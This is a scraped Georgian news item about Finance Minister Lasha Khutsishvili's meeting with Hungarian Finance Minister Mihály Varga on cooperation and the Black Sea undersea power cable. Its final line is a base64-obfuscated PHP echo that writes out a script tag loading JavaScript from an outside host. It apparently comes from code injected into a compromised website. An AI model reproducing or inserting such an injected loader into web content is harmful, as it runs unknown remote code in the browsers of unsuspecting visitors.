celsiusi
ავერსი შნაიდერი

ლაშა ხუციშვილმა უნგრეთის ფინანსთა მინისტრთან, მიხაი ვარგასთან გამართულ შეხვედრაზე განხილულ საკითხებზე ისაუბრა. როგორც მან აღნიშნა, საუბარი შეეხო ორმხრივი და რეგიონული თანამშრომლობის საკითხებს.

„უნგრეთის სამთავრობო დელეგაციის ვიზიტის ფარგლებში, შეხვედრა გაიმართა უნგრეთის ფინანსთა მინისტრთან. ტრადიციულად, ორ უწყებას ძალიან მჭიდრო თანამშრომლობა გვაკავშირებს. განხილული იქნა მიმდინარე და სამომავლო პროექტები, მათ შორის, ისეთი მნიშვნელოვანი პროექტი, როგორიცაა შავი ზღვის წყალქვეშა ელექტროგადამცემი კაბელი, რომელიც ძალიან მნიშვნელოვანია საქართველოსთვის და მთლიანად ჩვენი რეგიონისთვის, რაც აჩენს დამატებით საექსპორტო ბაზარზე წვდომის შესაძლებლობას, ხოლო მეორე მხრივ, ეს ასევე ძალიან მნიშვნელოვანია ევროკავშირისთვის ენერგოუსაფრთხოების კუთხით, იმ გამოწვევების დასაძლევად, რომელიც მას გააჩნია“, - განაცხადა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა.

29. 10. 2024 1

124
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");